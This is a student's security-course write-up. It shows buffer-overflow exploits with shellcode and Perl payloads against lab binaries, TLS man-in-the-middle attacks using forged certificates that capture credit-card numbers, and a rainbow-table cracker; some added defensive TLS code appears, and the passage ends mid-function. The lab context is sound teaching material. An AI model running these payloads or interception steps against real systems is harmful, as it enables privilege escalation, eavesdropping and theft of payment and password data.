Buffer overflows, knowledge requirements:
C/C++
Assembly
program memory allocation
Linux permissions.
There are three users on the same Linux machine, each with a secret.txt file.
Each of the users (superuser, hyperuser, masteruser) has an executable in their
directory which can be executed by all the other users. When executing the program,
users have the owner's permissions and not the permissions of the user executing it.
The goal is to create a shell from each of the executables, running with
the victim's privileges, by overwriting a useful address/bit.
Superuser:
program: convert.c
without any protection against buffer overflows.
Hyperuser:
program: arpsender.c
uses a canary to protect against buffer overflows.
Masteruser:
program: zoo.cpp
must be exploited through the virtual table pointer (VPTR).
Kotsomitopoulos Aristotelis
Project #1 ΥΣ13 Spring 2014 (computer system security)
SuperUser
Here we simply place in the RET slot an address that falls inside the NOPs at the start of our buffer, so
the instruction pointer slides forward until it reaches our SHELLCODE!
Our buffer looks like [NOP NOP NOP NOP...SHELLCODE...ADDR ADDR ADDR ADDR].
For example, an 820-byte buffer is enough to be sure we overwrite the RET value with ADDR:
we can use Exploit3.c from Aleph One with the value 820 = 720 (our date buffer) + 100 (a good
margin), which builds the buffer above for us, and then run:
/home/superuser$ ./convert a $EGG (our environment variable; code on the last page)
to open our shell. An alternative is to proceed as for the HYPERUSER and write a bash
script that overwrites the RET value with ADDR directly (almost the same as Aleph One's approach).
In gdb, "info locals" gives the start address of our date buffer, to which we add
a small offset to land on the address we want to overwrite, and "info f" shows when the RET value
has been overwritten with the address of the NOPs or the start of our shellcode, and we are DONE!!
---------------------------------------
supersecret.txt
---------------------------------------
$ cat supersecret.txt
One is is three in any people a of is in called In example read
a is the simply into parts to How is each the itself?
possible the that about is a interesting discussed
later orutnFolvthlleroj
SERIAL:1399762801-c9a58cf2a26af87ec9de1745f2eaed5f298dae7581b6dcd7d77d1eaa33104fad7031c4f9814bdcc3e572b8e0476c1e1aa0c1eb3523756beeaa1b4ee0d67d1c72
HyperUser
I first attacked hyperuser with the following script.
With it I jump to my RET address without touching
the canary, by going through a vulnerable pointer.
Hyperscript.sh (original code at last page)
#!/bin/bash
# chmod +x Hyperscript.sh
perl -e 'printf
# buffer address before the shellcode, inside the NOPs
"\x1e\xa0\x04\x08" .
# our 5th byte must have ASCII value 140
chr(140) .
# 60 x NOP
"\x90" x 60 .
# the shellcode
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" .
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56" .
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" .
"\xe8\xdc\xff\xff\xff/bin/sh" .
# 10 x NOP
"\x90" x 10 .
# the RET address, written over the vulnerable pointer
"AAAABAAACAAAAADAAAA\x8c\xf6\xff\xbf";' > output.txt
---------------------------------------
HYPERSECRET.txt
---------------------------------------
$ cat hypersecret.txt
interesting how possible people, general number
to secret text. something cryptography secret this that
right simple presented text divided three and three much
leaked share secret Is to secret no the leaked share? questions in on! nalisr inengeect
SERIAL:1400202302-bc1977e5b8b6526c4065fc92591f912e95075079bee1f1c6ae6d7b4b40390b9ece61342f212c1f5cf87cb0be4df16698c49f51191d7f417e067bf90db0b7f536
MasterUser
We overwrite the VPTR that lies just past our first buffer[256], and we must pass "-s" so
that the virtual function gets called.
We have to build a fake vtable inside our buffer to confuse the program: when the pointer
tries to call, for example, an overloaded operator or a print function through the vtable,
it loads our shellcode instead.
Using "info f" with a breakpoint at line 13 we find our THIS address (the object). The class
VTABLE starts at 0x804a008, so we replace the vptr with 0x804a008+4, which makes it
point there, and at 0x804a008+4 we place the address of our NOPs or shellcode.
Now our SHELLCODE can be executed:
std10048@sbox:/home/masteruser$ ./zoo -c `perl -e 'printf
"\x18\xa0\x04\x08\x18\xa0\x04\x08\x18\xa0\x04\x08\x90\x90\x90\x90" .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" .
"\xe8\xdc\xff\xff\xff/bin/sh" . "A" x 195 . "\x0c\xa0\x04\x08" x 8 ;'` -s
We could avoid appending the address 8 times at the end if we had counted, byte by byte,
the exact location of the vptr.
---------------------------------------
MASTERSECRET.txt
---------------------------------------
$ cat mastersecret.txt
question it for or for of share piece This that is sharing.
little you now solution where is vertically different distributed parties.
information from about passage it divide so information secret by
These will class Cgtao!sog haofpone
SERIAL:1400759702-8f9a1fe300998d1d45bdaf99740699fcc68786fb04d9c83b8056d6839f3aed2c66446bb9d17c5c1cfc6b3c4da35af78504713ab70b4c5082eae2f4ab44c3c7b2
Final TEXT SUPER+HYPER+MASTER
#include <algorithm>
#include <cstdlib>
#include <fstream>
#include <iostream>
#include <string>
#include <vector>
using namespace std;

// Read every whitespace-separated word of a file (wc -w filename.txt gives the count:
// 37, 38 and 37 words for the three shares).
static vector<string> read_words(const char *path) {
    ifstream in(path);
    if (!in) {
        cerr << "cannot open " << path << endl;
        exit(1);
    }
    vector<string> words;
    string w;
    while (in >> w)
        words.push_back(w);
    return words;
}

int main(void) {
    vector<string> Sword = read_words("superuser.txt");
    vector<string> Hword = read_words("hyperuser.txt");
    vector<string> Mword = read_words("masteruser.txt");
    // the secret was split vertically: word i of the text comes from share (i mod 3)
    size_t n = min({Sword.size(), Hword.size(), Mword.size()});   // 37
    for (size_t i = 0; i < n; i++)
        cout << Sword[i] << " " << Hword[i] << " " << Mword[i] << " ";
    // the hyperuser share holds one extra word, the last one of the text
    for (size_t i = n; i < Hword.size(); i++)
        cout << Hword[i] << " ";
    cout << endl;
    return 0;
}
So Our Final Text:
One interesting question is how it is possible for three people, or in general for
any number of people to share a secret piece of text.
This is something that in cryptography is called secret sharing. In this little
example that you read right now a simple solution is presented where the text is
simply divided vertically into three different parts and distributed to three
parties.
How much information is leaked from each share about the secret passage itself? Is
it possible to divide the secret so that no information about the secret is leaked
by a share? These interesting questions will discussed in class later on!
Cgtao!sog orutnFolvthlleroj nalisr haofpone inengeect
Exploit3.c
HyperScript.sh
Man-in-the-middle attack on the TLS protocol (RFC 5246)
An online shop webshop.com at the address https://sbox.di.uoa.gr/
and 6 different clients that try to connect to the webshop via TLS.
The webshop has a certificate signed by the certification authority Compsec CA.
All clients have access to the self-signed certificate of the Compsec CA.
On each ssh connection to sbox.di.uoa.gr the 6 clients will try to connect to the
webshop (one at a time).
Display message:
timestamp: XXXXXXXXXX
forwarding webshop client requests to port YYYYY
Because of a misconfiguration the clients will try to connect to port YYYYY instead of the
webshop's port (443). This gives us the opportunity for the man-in-the-middle attack.
Difficulty
1. Mr. Blonde. X
2. Mr. Blue. XX
3. Mr. Brown. XX
4. Mr. Orange. XX
5. Mr. Pink. XXXX
6. Mr. White. XXXXX
Kotsomitopoulos Aristotelis
Project #2 ΥΣ13 Spring 2014 (computer system security)
First, let's create a certification authority (CA).
My folder is "std10048@sbox:~/myProject2$" and we execute the following:
cp /etc/ssl/openssl.cnf . (in the copy we change the directory setting from ./demoCA to ./)
mkdir certs csr newcerts private
echo 00 > serial
echo 00 > crlnumber
touch index.txt
openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt
-days 3650 -config ./openssl.cnf
openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config
./openssl.cnf
The req command prompts for the CA's identification details.
Now we have our CA and the folders created.
With the CA ready, let's generate a certificate using it.
Let's attack Mr. Blonde first!
He is a really naive client who checks almost nothing, so:
openssl genrsa 1024 > private/MrBlond.key && openssl req -new -key
private/MrBlond.key -out csr/MrBlond.csr -config ./openssl.cnf
Now we complete the generation with the following command; for this client the certificate
does not even need to verify against the CA.
openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile
private/cakey.key -days 365 -out certs/MrBlond.crt -infiles csr/MrBlond.csr
So now we have our .crt and our .key:
std10048@sbox:~/myProject2/certs$ cat MrBlond.crt
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 0 (0x0)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=GR, ST=ATTICA, L=Athens, O=University of Athens, OU=Department of Informatics and
Telecommunications, CN=SBOX CA/emailAddress=csec.di@gmail.com
Validity
Not Before: Jun 7 13:02:45 2014 GMT
Not After : Jun 7 13:02:45 2015 GMT
Subject: C=GR, ST=ATTICA, L=Athens, O=Uoa, OU=DiT,
CN=idiot_Client/emailAddress=idiot_client@gmail.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
00:be:c7:07:e7:80:9a:ab:12:78:04:97:04:5e:2a:
6d:31:7b:29:1a:3e:78:10:f3:cb:b4:ed:f1:f9:87:
b3:72:57:01:ae:1f:2f:33:95:ba:cd:64:b5:20:37:
0d:cb:c8:df:eb:ff:e9:ca:47:1d:db:b6:2c:bb:35:
4f:66:2f:6a:c9:c0:2b:f1:12:fc:f1:58:72:03:b1:
8b:56:bf:44:14:af:ed:a6:0b:9c:92:2d:3b:e3:59:
9e:6d:32:cf:e4:cd:06:ff:af:dc:f2:d0:1b:1e:98:
b6:73:07:37:c3:a6:38:47:b1:7d:d3:d8:e4:f0:b5:
3b:4a:7f:fb:8e:af:7a:73:95
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
7E:B8:D8:FD:79:0C:F0:F2:DC:CE:9D:61:15:5D:91:13:4B:E2:F1:83
X509v3 Authority Key Identifier:
keyid:41:DF:39:D0:2D:BB:25:0D:70:38:3B:21:94:B8:C7:39:ED:05:AF:E1
Signature Algorithm: sha1WithRSAEncryption
03:19:8f:60:83:79:db:7a:99:c1:75:14:49:a7:fb:98:2e:c0:
23:24:39:04:43:6a:11:1d:b3:7b:b5:fe:36:ed:0e:bd:19:83:
8d:e7:43:e6:e4:c7:f1:f3:b6:28:1d:50:4f:82:d6:ac:32:95:
a6:1b:b1:52:3e:09:2c:c6:1a:86:55:1a:20:07:af:c4:60:f0:
2b:ef:59:b1:81:c5:66:8a:52:62:f1:e9:94:9b:ee:b6:76:fb:
98:ff:a9:94:8c:e7:fe:31:0c:06:7b:2e:3b:d4:d2:36:19:df:
e0:af:09:51:86:82:18:c6:57:da:e6:15:68:b0:79:0a:52:bd:
34:f6:1c:46:88:80:da:8a:2b:6f:33:4d:38:16:89:b9:ad:83:
ee:11:90:02:13:ce:e0:68:83:32:17:a4:70:82:5a:57:f9:64:
c3:74:2f:59:95:33:ce:7e:8c:81:b9:e7:b1:5e:dd:0e:b4:59:
2b:e5:b3:ed:38:40:7f:74:40:8f:fc:db:a4:b5:76:e0:74:e8:
1f:ba:f5:f1:ba:09:96:6d:90:0e:77:33:a3:27:0d:fb:c1:a6:
1c:53:51:71:3a:83:5c:ba:2e:12:67:40:5b:7e:b9:fb:91:97:
e8:ef:ff:8a:70:94:02:69:d7:39:42:4c:a3:0a:c0:b3:3d:42:
44:f2:8e:65
-----BEGIN CERTIFICATE-----
MIIDujCCAqKgAwIBAgIBADANBgkqhkiG9w0BAQUFADCBvTELMAkGA1UEBhMCR1Ix
DzANBgNVBAgMBkFUVElDQTEPMA0GA1UEBwwGQXRoZW5zMR0wGwYDVQQKDBRVbml2
ZXJzaXR5IG9mIEF0aGVuczE5MDcGA1UECwwwRGVwYXJ0bWVudCBvZiBJbmZvcm1h
dGljcyBhbmQgVGVsZWNvbW11bmljYXRpb25zMRAwDgYDVQQDDAdTQk9YIENBMSAw
HgYJKoZIhvcNAQkBFhFjc2VjLmRpQGdtYWlsLmNvbTAeFw0xNDA2MDcxMzAyNDVa
Fw0xNTA2MDcxMzAyNDVaMIGJMQswCQYDVQQGEwJHUjEPMA0GA1UECAwGQVRUSUNB
MQ8wDQYDVQQHDAZBdGhlbnMxDDAKBgNVBAoMA1VvYTEMMAoGA1UECwwDRGlUMRUw
EwYDVQQDDAxpZGlvdF9DbGllbnQxJTAjBgkqhkiG9w0BCQEWFmlkaW90X2NsaWVu
dEBnbWFpbC5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAL7HB+eAmqsS
eASXBF4qbTF7KRo+eBDzy7Tt8fmHs3JXAa4fLzOVus1ktSA3DcvI3+v/6cpHHdu2
LLs1T2YvasnAK/ES/PFYcgOxi1a/RBSv7aYLnJItO+NZnm0yz+TNBv+v3PLQGx6Y
tnMHN8OmOEexfdPY5PC1O0p/+46venOVAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJ
YIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1Ud
DgQWBBR+uNj9eQzw8tzOnWEVXZETS+LxgzAfBgNVHSMEGDAWgBRB3znQLbslDXA4
OyGUuMc57QWv4TANBgkqhkiG9w0BAQUFAAOCAQEAAxmPYIN523qZwXUUSaf7mC7A
IyQ5BENqER2ze7X+Nu0OvRmDjedD5uTH8fO2KB1QT4LWrDKVphuxUj4JLMYahlUa
IAevxGDwK+9ZsYHFZopSYvHplJvutnb7mP+plIzn/jEMBnsuO9TSNhnf4K8JUYaC
GMZX2uYVaLB5ClK9NPYcRoiA2oorbzNNOBaJua2D7hGQAhPO4GiDMhekcIJaV/lk
w3QvWZUzzn6MgbnnsV7dDrRZK+Wz7ThAf3RAj/zbpLV24HToH7r18boJlm2QDncz
oycN+8GmHFNRcTqDXLouEmdAW365+5GX6O//inCUAmnXOUJMowrAsz1CRPKOZQ==
-----END CERTIFICATE-----
std10048@sbox:~/myProject2/private$ cat MrBlond.key
-----BEGIN RSA PRIVATE KEY-----
(key material not reproduced)
-----END RSA PRIVATE KEY-----
Now we can run twistedeve like this:
command:
twistedeve -c certs/MrBlond.crt -k private/MrBlond.key -a localhost:10048 -t
localhost:443 -b localhost:46619
so we are the man in the middle. After the command runs we open a new terminal,
log in, find the correct port (46619 this time) for our connection, and our Mr. Blonde
client has been hacked:
So this is the first client's credit card and timestamp:
'cc=4916105057678726&timestamp=1402146284'
Now let's attack Mr. Blue (I named the files brown).
He is more "clever" than Mr. Blonde but has a different weakness:
he checks only the name in the certificate. So with our previous CA we create a new certificate,
but this time we enter "sbox.di.uoa.gr" in the
common name field.
Then we simply run twistedeve again:
twistedeve -c certs/brown.crt -k private/brown.key -a localhost:10048 -t
localhost:443 -b localhost:48211
and we can observe Mr. Blue's credit card and timestamp:
'cc=4556270584159924&timestamp=1402148722'
Now let's attack Mr. Brown. We know that webshop and mysite both have the same
Certification Authority (the SBOX CA), and Mr. Brown checks only whether our .crt and .key are
verified by the SBOX CA and nothing more:
SBOX CA
mysite.com webshop.com
So we use twistedeve with /var/project2/mysite.com.crt and
/var/project2/mysite.com.key
and we get Mr. Brown's credit card!
Command:
twistedeve -c /var/project2/mysite.com.crt -k /var/project2/mysite.com.key -a
localhost:10048 -t localhost:443 -b localhost:46749
So here are the credit card and timestamp for Mr. Brown:
'cc=4539346713524865&timestamp=1402150208'
Mr. Orange now: we will use a certificate chain.
We now know how to create a CA, generate certificates and sign them, so
let's try something different!
In a new folder, after these commands:
cp /etc/ssl/openssl.cnf .
mkdir certs csr newcerts private
echo 00 > serial
echo 00 > crlnumber
touch index.txt
instead of using:
openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt
-days 3650 -config ./openssl.cnf
(the command above would create a brand new cakey.key and cacert.crt) we use our
existing ones from mysite.com: we go to /var/project2/ and copy our
mysite.com.key and our mysite.com.crt.
Now we create the two files our next command expects,
cacert.crt and private/cakey.key,
and paste in the copied contents from mysite.
Now we can run the generation command with our custom files:
openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config
./openssl.cnf
Now we generate our certificate using the above CA:
openssl genrsa 1024 > private/sbox.di.uoa.gr.key && openssl req -new -key
private/sbox.di.uoa.gr.key -out csr/sbox.di.uoa.gr.csr -config ./openssl.cnf
openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile
private/cakey.key -days 365 -out certs/sbox.di.uoa.gr.crt -infiles
csr/sbox.di.uoa.gr.csr
Now let's build our certificate chain: into certs/sbox.di.uoa.gr.crt we also paste
the plain mysite.com certificate, so the client gets the confusion we expect
and our "man in the middle" obtains the victim's credit card number.
-----BEGIN CERTIFICATE-----
.....
our above created certificate code
.....
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
.....
mysite.com certificate code
.....
-----END CERTIFICATE-----
So the file is our own certificate followed by the one copied from mysite.com.crt.
Now we start twistedeve with that .crt and .key and see:
twistedeve -c certs/sbox.di.uoa.gr.crt -k private/sbox.di.uoa.gr.key -a
localhost:10048 -t localhost:443 -b localhost:41866
Our man in the middle listens on port 41866.
We log in and realise that Mr. Orange has been hacked:
the credit card attack succeeded!
So the credit card number & timestamp is:
'c=4716666995541278&timestamp=1402231087'
For Mr. Pink now, let's try twistedeve with a filter and without a certificate:
twistedeve -c -f /var/project2/filters/tlsinfo.py -a localhost:10048 -t
localhost:443 -b localhost:41866
so we can see what protocols, cipher suites etc. the client and the server support.
We see that client 5, Mr. Pink, uses TLS_DH_anon_WITH_AES.., and here
is the problem: we can create a custom openssl server listening on a port, 44444,
then redirect our users to that port with twistedeve, with our openssl server
set to the "no certificate" option. That option restricts the cipher suites available
to the anonymous ones (currently just anonymous DH).
Here we can see that DH_anon is used!
So let's create our openssl server:
openssl s_server -accept 44444 -nocert -cipher DH
(cipher suites using DH, including anonymous DH)
Now we run twistedeve like this:
twistedeve -c -a localhost:10048 -t localhost:44444 -b localhost:43566 (clients'
port)
Then we run our clients against port 43566 with our server and twistedeve open (we
need three terminals).
ALL clients fail except Mr. Pink, so we can steal his credit card!
Mr. Pink: request sent
everything else failed!
Credit card and timestamp
So Mr. Pink's credit card & timestamp is:
4486750853453368&timestamp=1402274478
Mr. White has complete TLS protection, so he needs a more powerful hacker to be
hacked!!!
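The client-side checks whose absence the cases above exploit, collected as an added Python example (this is not the project's code and does not involve twistedeve): a client context that verifies the chain against the chosen CA, checks the host name and refuses anonymous key exchange, plus the host-name check applied to certificate data in the shape Python's getpeercert() returns. The two sample certificate dicts are constructed for the example; MRBLOND_CERT follows the MrBlond.crt printed above, and the webshop's real certificate is assumed to carry a DNS subjectAltName for sbox.di.uoa.gr.

```python
import ssl

# Added example: the checks Mr. Blonde, Mr. Blue, Mr. Brown and Mr. Pink
# skipped, expressed with the standard-library ssl module.


def make_client_context(cafile=None):
    """Client context that verifies the chain against a chosen CA, checks the
    host name and refuses anonymous key exchange.  cafile is the trusted CA
    bundle (the Compsec CA certificate in the lab); None uses the system store."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.verify_mode = ssl.CERT_REQUIRED   # Mr. Blonde accepted any certificate
    ctx.check_hostname = True             # Mr. Brown accepted any name from the CA
    if cafile:
        ctx.load_verify_locations(cafile=cafile)
    else:
        ctx.load_default_certs()
    # Mr. Pink negotiated TLS_DH_anon_*: no server authentication at all.
    ctx.set_ciphers("DEFAULT:!aNULL:!eNULL:!MD5:!RC4")
    return ctx


def anonymous_ciphers(ctx):
    """Names of enabled suites that authenticate nobody (ADH / AECDH / anon)."""
    return [c["name"] for c in ctx.get_ciphers()
            if any(tag in c["name"].upper() for tag in ("ADH", "AECDH", "ANON"))]


def context_summary(ctx):
    """Plain-data view of the settings that matter, for checking and logging."""
    return {
        "verify_required": ctx.verify_mode == ssl.CERT_REQUIRED,
        "check_hostname": ctx.check_hostname,
        "min_tls12": ctx.minimum_version >= ssl.TLSVersion.TLSv1_2,
        "anonymous_suites": anonymous_ciphers(ctx),
    }


def hostname_matches(peercert, expected):
    """The name check Mr. Blue and Mr. Brown got wrong, applied to the dict
    shape ssl.SSLSocket.getpeercert() returns: the expected host must appear in
    the DNS subjectAltName entries (a single wildcard is allowed as the
    left-most label and never matches a bare second-level name).  The CN is
    consulted only when the certificate carries no SAN at all, as legacy
    (pre-RFC 6125) clients did."""
    expected = expected.lower().rstrip(".")
    names = [v.lower() for k, v in peercert.get("subjectAltName", ()) if k == "DNS"]
    if not names:
        for rdn in peercert.get("subject", ()):
            for key, value in rdn:
                if key == "commonName":
                    names.append(value.lower())
    for pattern in names:
        if pattern == expected:
            return True
        if pattern.startswith("*."):
            if expected.count(".") >= 2 and pattern.split(".")[1:] == expected.split(".")[1:]:
                return True
    return False


# Constructed peer certificates in getpeercert() form.  MRBLOND_CERT mirrors the
# MrBlond.crt printed above (CN=idiot_Client, issued by SBOX CA, no SAN);
# WEBSHOP_CERT is what a genuine webshop certificate is assumed to carry.
MRBLOND_CERT = {
    "subject": ((("countryName", "GR"),), (("commonName", "idiot_Client"),)),
    "issuer": ((("commonName", "SBOX CA"),),),
}
WEBSHOP_CERT = {
    "subject": ((("commonName", "sbox.di.uoa.gr"),),),
    "issuer": ((("commonName", "SBOX CA"),),),
    "subjectAltName": (("DNS", "sbox.di.uoa.gr"), ("DNS", "*.di.uoa.gr")),
}

if __name__ == "__main__":
    print(context_summary(make_client_context()))
    print("MrBlond cert for sbox.di.uoa.gr:", hostname_matches(MRBLOND_CERT, "sbox.di.uoa.gr"))
    print("webshop cert for sbox.di.uoa.gr:", hostname_matches(WEBSHOP_CERT, "sbox.di.uoa.gr"))
```

A client built this way fails in each of the first five cases: a certificate from the attacker's own CA does not chain to the single CA loaded with load_verify_locations, the mysite.com certificate and the chain built for Mr. Orange fail the host-name check (and OpenSSL's chain building rejects an intermediate that lacks the CA basic constraint), and the anonymous suite Mr. Pink accepted is never offered.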
Rainbow Tables
Kotsomitopoulos Aristotelis
Project #3 ΥΣ13 Spring 2014 (Computer System Security)
I want to crack a password of 6 characters drawn from
the given alphabet.
Alphabet (64):
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@"
so an example password is "AriS1@".
To crack this password I will use rainbow tables!
Passwords are stored as the output of a hash function. Hashes are one-way operations:
even if an attacker gained access to the hashed version of your password, it is not
possible to reconstitute the password from the hash value alone, but it is possible to
attack the hashed value of your password using rainbow tables.
We have 64^6 different passwords = 68.719.476.736 = 69 billion different passwords.
First of all I create, for example, 1.000.000 different 6-character passwords, and these are
the starts of my chains, something like:
!!!7B0
!!!80!
QBLfQU
VM7Ucl
eORyLL
lXO8rC
t9p48R
8Qi!cm
8QjgAU
I3m2Zn
.....
...
Now for every plaintext above we build a chain:
plaintext ->
hash = blake(plaintext) ->
new_plaintext = my_reduction_function(hash) ->
hash = blake(new_plaintext) -> repeat ..... -> ...... -> ....
In my program each chain is 10.000 long, so for every start plaintext I apply
blake + my_reduction_function 10000 times.
Finally I have almost 1.000.000 x 10000 = 10 billion different values (without
collisions), so for a single given password I have about a 1/7 chance to crack it,
but now I have more than 15 passwords given, so that size is enough with a bit of luck...
Generating a table of that size took more than 16 hours... in my opinion the best
size for this problem would be 5 million x 10.000, but that needs a lot of time to be
generated even with threads on a multicore processor!
After that huge generation I put the results in a .txt file, and my search/find
password program uses that table to crack the password. The file looks like this:
output_1mX10000.txt
!!!7B0 77240e13ebff7ea020e62d90975cd17963fa818bec3f55836e2fcd4780ea48d9 (1)
!!!80! f55715be2179b0fb9d3f83bdb39fed8374afcbaea9213e4f2001a0b8734a0765(2)
!!!80Z 3410c7d80d27f5bd489f5dd5c0533043c6ce17c363f8ab7acf7b91511df5ac96(3)
!!!YI2 1657ca495a203164edc363700c86adbe54374edc05cf474e70030a842f76da68(4)
!!!oC@ 0f1e9b44a2441c46f0c525f5c22777c4f009ec1b0f5776604b42639cf230648f(5)
!!!uZW d2953ba6e7074c76c0461eb8ec7d7c36bcb434001284abba8d0c92d6bd892f7a(6)
!!07fO 5b9ef9c41b5444476e2c66e050c795031185f42bfc40bf8f174f1e0e3bb8f581(7)
!!0JB0 7a73cb5357eb35ecfc82ebc351112824c54bdaa70603fe5262e21f22fd13cd60(8)
!!0R7U 6ffdb183126ca9e70b659ea45f4dcb0ca78c7136f72fa733bb960d315eca19a0(9)
!!0XJ6 85b0c65a867e08b6ae7d7d65ddae3c6e4def38ad805cbb96b75a49884928852b(10)
!!0fNM 790fe297f6ca448cdd97e083176ad3e492258ea2167f9048119da9dcbfaa12d9(11)
!!0kyY 5498173ef57774579a8095eb6d32a2bee8cac4bf9153ddda011ab33d600d6257(12)
!!0rik 73288f5ab7e7fc5b1d2a387dacc6401b24c422494d5d4f6ad280e4d046b83327(13)
!!1wh0 98f12f574918ff51e92369c38d9369d474b2f2bf0291d79e6bb3be71ed7abd2d(14)
.......
...............
........................
.............................
zzxEpx f9042996c416d9f32395b0bb967aca9df277f4e8dcd14794bc60a820aa5d286f(999988)
zzxMxc c1409a47dab4ce96a013a7033c868d56888a748cf670c28b86c1413c6801fd92(999989)
zzxpFE e6dba8c5b25946070e7f680e2255a08aba46ca92fdf2e818f245ad01fb8fba03(999990)
zzxvEY f028262e61fee77d2104ef928d195d6b401fdb50522bdacad088ab0df197a756(999991)
zzyw9@ 0861fc88106fffb2e9731b5a6b67b5ffc891d19d2b8b8334c57a97ce50bf3e0a(999992)
zzz4sv bf6aef7de87249ecaee1bb8c83b1025d3c238226f1ce47999b1dbc24fd2bab6e(999993)
zzzAuV dd6e7cfa2031148cf1c22c1756bd7f5a0cb8c96e581e87cf1fb3dada8963cfee(999994)
zzzGGs 8872e669d2284297bbfe4494ced287de58ff0b60c66d3a1b46a8b7657cc1188f(999995)
zzzRqC d5859daaf422a4c73dafe382292c5e1c9dba17361d9176663658a8a48b9e3a08(999996)
zzzTe5 946a862717e78677d6eb96b25f952cdee0a91de870789b129abc1d8e4ff15eca(999997)
zzzZ67 9750c53137b46208040c93b08cc7ed1454a4fe0e1583511153291bcd0e40b393(999998)
zzzgB3 4a5af0f0a7c1b61137bcd1143d447a05c8ada3d63eade369286e807f0b9c554a(999999)
zzzyqE a36a2403b3adb9c50094866613fd2e956f500868cbc2a6ee9a99ba8ec8c41b79(1000000)
To reduce collisions I tried a lot of different reduction functions with
a lot of tests. My final function produces a 6-character-long pseudo-random password
from a given 64-character-long hash as follows:
I map every character of the hash (16 different characters, 0123456789abcdef) onto
my alphabet "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@":
I add up the first 10 hash characters (e.g. 0Fa2.. = 0+15+10+2..) and XOR the sum with the
sum of the next 10; that gives a number, and number MOD 64 gives an index into my
alphabet (for example 63 is '@'). For the 6th character I use the last 4 characters + the 6
first ones. In this way I produce a deterministic pseudo-random string (plaintext) for my chain!
#include <string>
using std::string;

string plaintext_from_hash3(string my_hash){
    string charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@";
    string result;
    /* for the last XOR: the raw character codes of hash[60..63] plus the 6 first characters */
    int last_digits = my_hash[60]+my_hash[61]+my_hash[62]+my_hash[63];
    for(int i=0; i<6; i++)
        last_digits += my_hash[i];
    /* for the other 5 XORs: the sum of the hex digit values in each block of 10 hash characters */
    int for_XOR[6];
    for(int i=0; i<6; i++){
        int sum=0;
        for(int j=0; j<10; j++){
            char c = my_hash[i*10+j];
            if(c >= '0' && c <= '9')
                sum += c - '0';
            else if(c >= 'a' && c <= 'f')
                sum += c - 'a' + 10;
        }
        for_XOR[i] = sum;
    }
    /* XOR neighbouring block sums; both operands are non-negative, so the result is too */
    for(int i=0; i<5; i++)
        result += charset[(for_XOR[i] ^ for_XOR[i+1]) % 64];
    result += charset[(for_XOR[5] ^ last_digits) % 64];
    return result;
}
Let's assume, for example, that after using dbus-monitor on sbox.di.uoa.gr we get the
following hash:
9b465fce3fd32aa5531f801d4c63f31380adc84c62f0d170aaf535619b85a928
We search for the above hash in our table. IF WE FIND IT, we use that chain's
start plaintext to obtain the password: we apply blake->reduction->blake->reduction..
until we reach our given hash (in this case it would be the last one), and the plaintext that
produced this hash is our cracked password! If the given hash does not match any
of the rainbow table hashes, we apply the reduction function to it, then blake,
and search again; if we find it, we again walk the matching
chain looking for the FIRST hash (the original one, not the new one). If that fails too, we keep
hashing and reducing the given hash until we find a chain match in the rainbow table. If,
in my setup, we go through 10.000 loops without a match, we have failed and that password
cannot be cracked with my table. If we find a match but, after expanding the matching
chain for 10.000 steps, we do not find our FIRST hash, we do not stop: we continue
expanding and searching for another chain MATCH!! If we check every possible chain and
the FIRST hash is not there, the password cannot be cracked with that rainbow table.
If we had used a bigger one, there would be an almost 100% chance that the password would be
cracked!
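The chain construction (plaintext -> blake -> reduction -> ...), the reduction function and the lookup procedure described above, as one added Python example that is not the project's code: hashlib's BLAKE2s stands in for the blake the project used (same 64-hex-character output), reduce_hash is a port of plaintext_from_hash3 with an added column parameter (column=0 is exactly the page's function), and the chain length of 50 and the three start points are constructed for the demonstration.

```python
import hashlib

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@"


def H(plaintext):
    """Stand-in for the page's 'blake': BLAKE2s with a 32-byte digest, giving
    the same 64-hex-character output the table above shows."""
    return hashlib.blake2s(plaintext.encode(), digest_size=32).hexdigest()


def reduce_hash(h, column=0):
    """Port of plaintext_from_hash3: the six sums of 10 hex digits are XORed
    pairwise, and the last character mixes in the raw ASCII codes of
    hash[60:64] and hash[0:6].  `column` (not in the page) makes the function
    depend on the chain position, the rainbow-table refinement that stops two
    chains merging when they collide in different columns; column=0 is exactly
    the page's function."""
    sums = [sum(int(c, 16) for c in h[10 * i:10 * i + 10]) for i in range(6)]
    last = sum(ord(c) for c in h[60:64]) + sum(ord(c) for c in h[0:6]) + column
    out = [ALPHABET[(sums[i] ^ sums[i + 1]) % 64] for i in range(5)]
    out.append(ALPHABET[(sums[5] ^ last) % 64])
    return "".join(out)


def plaintext_at(start, column):
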